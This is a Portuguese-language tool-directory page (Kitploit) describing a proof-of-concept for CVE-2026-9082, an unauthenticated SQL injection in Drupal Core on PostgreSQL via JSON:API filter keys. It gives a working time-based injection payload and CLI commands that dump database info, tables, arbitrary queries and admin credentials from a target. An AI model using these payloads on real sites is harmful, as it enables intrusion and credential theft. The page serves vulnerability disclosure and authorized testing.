Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-9082-Drupal-PoC — Drupal Core PostgreSQL SQL Injection PoC - CVE-2026-9082. PoC ético para a vulnerabilidade do Drupal que permite injeção SQL anônima através do módulo JSON:API em sites com PostgreSQL. | Kitploit
Ferramentas/GitHubGitHub/7h30th3r0n3/cve-2026-9082-drupal-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHub7h30th3r0n3/cve-2026-9082-drupal-poc

CVE-2026-9082-Drupal-PoC

Drupal Core PostgreSQL SQL Injection PoC - CVE-2026-9082. PoC ético para a vulnerabilidade do Drupal que permite injeção SQL anônima através do módulo JSON:API em sites com PostgreSQL.

Ver Repositório
2341há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-9082 - PoC de Injeção SQL em PostgreSQL do Drupal Core

Drupal Logo


Visão Geral

Este repositório fornece uma Prova de Conceito (PoC) ética para CVE-2026-9082, uma vulnerabilidade de injeção SQL Altamente Crítica no Drupal Core que afeta todos os sites com backend PostgreSQL rodando Drupal 8.0 até 11.3.9.

A falha reside no manipulador de Condição de Consulta de Entidade do PostgreSQL e pode ser explorada por usuários anônimos (não autenticados) através do módulo JSON:API, que está habilitado por padrão desde o Drupal 9.

Aviso oficial: SA-CORE-2026-004


Resumo da Vulnerabilidade

O Drupal Core inclui uma API de abstração de banco de dados projetada para higienizar consultas e prevenir injeção SQL. Uma falha na classe de Condição de Consulta de Entidade específica do PostgreSQL (core/modules/pgsql/src/EntityQuery/Condition.php) permite que um atacante injete SQL arbitrário através de chaves de array controladas pelo usuário passadas via parâmetros de filtro JSON:API.

  • ID do CVE: CVE-2026-9082
  • Aviso: SA-CORE-2026-004
  • Software Afetado: Drupal Core
  • Versões Afetadas: 8.0.0 – 11.3.9 (apenas backend PostgreSQL)
  • Corrigido em: 11.3.10, 11.2.12, 10.6.9, 10.5.10
  • Gravidade: Altamente Crítica — 20/25 na escala de risco do Drupal
  • Autenticação: Nenhuma necessária (anônimo)
  • Impacto: Exfiltração de dados, escalonamento de privilégios, RCE em algumas configurações
  • Vetor de ataque: HTTP — chaves de array de condição de filtro JSON:API
  • Como funciona

    1. O método translateCondition() na classe de Condição do PostgreSQL itera sobre $condition['value'] e usa as chaves do array para construir nomes de placeholders PDO:
      $where_id = $where_prefix . $key;
    2. JSON:API permite que usuários anônimos forneçam valores de filtro com chaves de array arbitrárias via parâmetros de URL:
      filter[x][condition][value][MALICIOUS_KEY]=val
    3. Os placeholders nomeados do PDO consistem apenas de caracteres [a-zA-Z0-9_]. Quando a chave contém ), o PDO para de analisar o nome do placeholder — tudo depois se torna SQL literal injetado na consulta.
    4. Ao enviar uma chave como 1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--, o atacante fecha a cláusula IN() e anexa SQL arbitrário, enquanto a ligação para :prefix_1 é satisfeita por uma chave legítima 1 na mesma requisição.

    Referências e Créditos

    • Aviso: SA-CORE-2026-004
    • Commit de correção: ea9524d9
    • Descoberto por: michaelmaturi (creditado no aviso)

    Aviso Legal

    Esta ferramenta é destinada apenas para testes de segurança autorizados, fins educacionais e pesquisa ética. O acesso não autorizado a sistemas de computador é ilegal.


    Instalação

    root@kitploit:~
    git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
    cd CVE-2026-9082-Drupal-PoC
    pip install requests rich

    Uso (CLI)

    root@kitploit:~
    # Check if target is vulnerable
    python3 CVE-2026-9082.py -u https://target.com --check
    
    # Extract PostgreSQL version
    python3 CVE-2026-9082.py -u https://target.com --version
    
    # Extract database info (user + db name)
    python3 CVE-2026-9082.py -u https://target.com --dbinfo
    
    # Extract Drupal admin credentials (uid=1)
    python3 CVE-2026-9082.py -u https://target.com --admin
    
    # List database tables
    python3 CVE-2026-9082.py -u https://target.com --tables
    
    # Custom SQL query extraction
    python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"
    
    # Use boolean-based extraction (faster but less reliable)
    python3 CVE-2026-9082.py -u https://target.com --version -m bool
    
    # Interactive mode (no arguments)
    python3 CVE-2026-9082.py

    Autor

    • PoC desenvolvido por 7h30th3r0n3
    • Vulnerabilidade descoberta por michaelmaturi
    Baixar ferramenta